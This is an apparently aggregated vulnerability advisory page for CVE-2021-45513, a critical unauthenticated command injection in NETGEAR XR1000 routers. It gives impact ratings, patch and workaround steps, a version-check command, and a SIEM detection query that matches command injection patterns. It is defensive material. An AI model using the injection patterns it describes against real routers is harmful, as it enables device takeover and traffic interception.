Login Sign Up

CVE-2021-45513

9.6 CRITICAL
Remote Code Execution

📋 TL;DR

This vulnerability allows unauthenticated attackers to execute arbitrary commands on NETGEAR XR1000 routers. Attackers can gain full control of affected devices by injecting malicious commands through network requests. All users with XR1000 routers running vulnerable firmware are affected.

💻 Affected Systems

Products:
  • NETGEAR XR1000
Versions: All versions before 1.0.0.58
Operating Systems: NETGEAR proprietary firmware
Default Config Vulnerable: ⚠️ Yes
Notes: All default configurations are vulnerable. No special configuration required for exploitation.

📦 What is this software?

Xr1000 Firmware by Netgear

View all CVEs affecting Xr1000 Firmware →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete device compromise allowing attackers to install persistent malware, intercept all network traffic, pivot to internal networks, or use the device as part of a botnet.

🟠

Likely Case

Attackers gain remote shell access to modify router settings, steal credentials, or deploy cryptocurrency miners.

🟢

If Mitigated

If properly patched, no impact. With network segmentation, impact limited to router itself.

🌐 Internet-Facing: HIGH - Routers are typically internet-facing and the exploit requires no authentication.
🏢 Internal Only: MEDIUM - Could be exploited from internal networks if attacker gains initial access.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploit requires sending specially crafted HTTP requests to vulnerable endpoints. No authentication needed.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.0.0.58 or later

Vendor Advisory: https://kb.netgear.com/000064149/Security-Advisory-for-Command-Injection-on-XR1000-PSV-2021-0010

Restart Required: Yes

Instructions:

1. Log into router admin interface. 2. Navigate to Advanced > Administration > Firmware Update. 3. Check for updates and install version 1.0.0.58 or later. 4. Reboot router after update completes.

🔧 Temporary Workarounds

Network Segmentation

all

Isolate router management interface from untrusted networks

Access Control Lists

all

Restrict access to router management interface to trusted IPs only

🧯 If You Can't Patch

  • Disable remote management and WAN-side administration
  • Place router behind firewall with strict inbound rules

🔍 How to Verify

Check if Vulnerable:

Check firmware version in router admin interface under Advanced > Administration > Firmware Update

Check Version:

curl -s http://router_ip/currentsetting.htm | grep firmware_version

Verify Fix Applied:

Confirm firmware version is 1.0.0.58 or later in admin interface

📡 Detection & Monitoring

Log Indicators:

  • Unusual command execution in system logs
  • Multiple failed login attempts followed by successful command execution
  • Suspicious HTTP requests to router management endpoints

Network Indicators:

  • Unusual outbound connections from router
  • HTTP requests with command injection patterns to router IP
  • Traffic to known malicious IPs from router

SIEM Query:

source="router_logs" AND ("cmd=" OR "exec=" OR "system(") AND dest_ip="router_ip"

📊 Metadata

CVE ID: CVE-2021-45513
CVSS v3 Score: 9.6 (CRITICAL)
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CWE: CWE-77
Published: December 26, 2021
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2021-45513, you might also want to check these:

CVE-2024-48841 10.0

This critical vulnerability in FLXEON software allows remote attackers to execute arbitrary code wit...

Same vulnerability type (CWE-77)
CVE-2025-59818 10.0

This vulnerability allows authenticated attackers to execute arbitrary system commands by manipulati...

Same vulnerability type (CWE-77)
CVE-2024-28354 10.0

This is a critical command injection vulnerability in TRENDnet TEW-827DRU routers that allows remote...

Same vulnerability type (CWE-77)